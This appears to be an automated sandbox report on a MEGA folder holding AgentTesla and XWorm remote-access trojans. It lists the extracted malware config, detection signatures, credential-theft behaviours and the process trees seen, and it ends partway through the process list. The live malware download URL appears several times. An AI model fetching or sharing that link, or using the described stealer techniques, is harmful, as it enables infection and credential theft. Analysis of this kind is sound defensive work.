agenttesla | hxxps://mega[.]nz/folder/tvoHkKCI#gHpEG0WlFUWYHOi8JS4veg

Analysis

max time kernel
1799s
max time network
1788s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-08-2024 18:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/folder/tvoHkKCI#gHpEG0WlFUWYHOi8JS4veg

Score

10^/10

agenttesla xenarmor xworm agilenet collection credential_access defense_evasion discovery keylogger password rat recovery spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

127.0.0.1:7000

Attributes

install_file
USB.exe

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/2212-1026-0x0000000002830000-0x000000000283E000-memory.dmp	disable_win_def

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00100000000235de-963.dat	family_xworm
behavioral1/memory/2212-975-0x00000000007A0000-0x00000000007B2000-memory.dmp	family_xworm

XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
recovery password xenarmor
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral1/memory/2828-387-0x00000182ABCC0000-0x00000182ABEB4000-memory.dmp	family_agenttesla

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

ACProtect 1.3x - 1.4x DLL software 5 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00070000000235fd-1036.dat	acprotect
behavioral1/files/0x00070000000235fe-1041.dat	acprotect
behavioral1/files/0x0007000000023601-1056.dat	acprotect
behavioral1/files/0x0007000000023600-1051.dat	acprotect
behavioral1/files/0x00070000000235ff-1046.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	virussssssssssssss.exe

Executes dropped EXE 8 IoCs

pid	Process
2020	Progman.exe
2828	XWorm.exe
2036	Progman.exe
1452	XWorm.exe
2212	virussssssssssssss.exe
4064	virussssssssssssss.exe
2620	virussssssssssssss.exe
4960	All-In-One.exe

Loads dropped DLL 1 IoCs

pid	Process
4960	All-In-One.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/files/0x000700000002357e-327.dat	agile_net
behavioral1/memory/2828-385-0x000001828E2A0000-0x0000018291518000-memory.dmp	agile_net

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00090000000235c0-305.dat	upx
behavioral1/memory/2020-312-0x0000000140000000-0x00000001407A1000-memory.dmp	upx
behavioral1/files/0x00070000000235fd-1036.dat	upx
behavioral1/files/0x00070000000235fe-1041.dat	upx
behavioral1/files/0x0007000000023601-1056.dat	upx
behavioral1/files/0x0007000000023600-1051.dat	upx
behavioral1/files/0x00070000000235ff-1046.dat	upx

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	All-In-One.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2828	XWorm.exe
2828	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Progman.exe	XWorm V5.3.exe
File opened for modification	C:\Windows\Progman.exe	XWorm V5.3.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	All-In-One.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	XWorm V5.3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	XWorm V5.3.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 67821.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2212	virussssssssssssss.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
3436	msedge.exe
3436	msedge.exe
3004	msedge.exe
3004	msedge.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
1452	XWorm.exe
3612	msedge.exe
3612	msedge.exe
3620	msedge.exe
3620	msedge.exe
3124	identity_helper.exe
3124	identity_helper.exe
1424	msedge.exe
1424	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
3444	msedge.exe
4960	All-In-One.exe
4960	All-In-One.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1452	XWorm.exe
2212	virussssssssssssss.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: 33	2256	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2256	AUDIODG.EXE
Token: 33	428	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	428	AUDIODG.EXE
Token: SeDebugPrivilege	2212	virussssssssssssss.exe
Token: SeDebugPrivilege	4064	virussssssssssssss.exe
Token: SeDebugPrivilege	2620	virussssssssssssss.exe
Token: SeDebugPrivilege	4960	All-In-One.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
1452	XWorm.exe
3004	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe

Suspicious use of SendNotifyMessage 49 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
1452	XWorm.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe
3620	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2220	XWorm V5.3.exe
4352	XWorm V5.3.exe
4960	All-In-One.exe
4960	All-In-One.exe
2212	virussssssssssssss.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3004 wrote to memory of 1768	3004	msedge.exe	83
PID 3004 wrote to memory of 1768	3004	msedge.exe	83
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 932	3004	msedge.exe	84
PID 3004 wrote to memory of 3436	3004	msedge.exe	85
PID 3004 wrote to memory of 3436	3004	msedge.exe	85
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86
PID 3004 wrote to memory of 1744	3004	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/folder/tvoHkKCI#gHpEG0WlFUWYHOi8JS4veg
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8996946f8,0x7ff899694708,0x7ff899694718
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
  2⤵
  PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
  2⤵
  PID:1744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4036 /prefetch:8
  2⤵
  PID:432
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 /prefetch:8
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:2036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5736 /prefetch:8
  2⤵
  PID:1228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4836 /prefetch:2
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:3472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
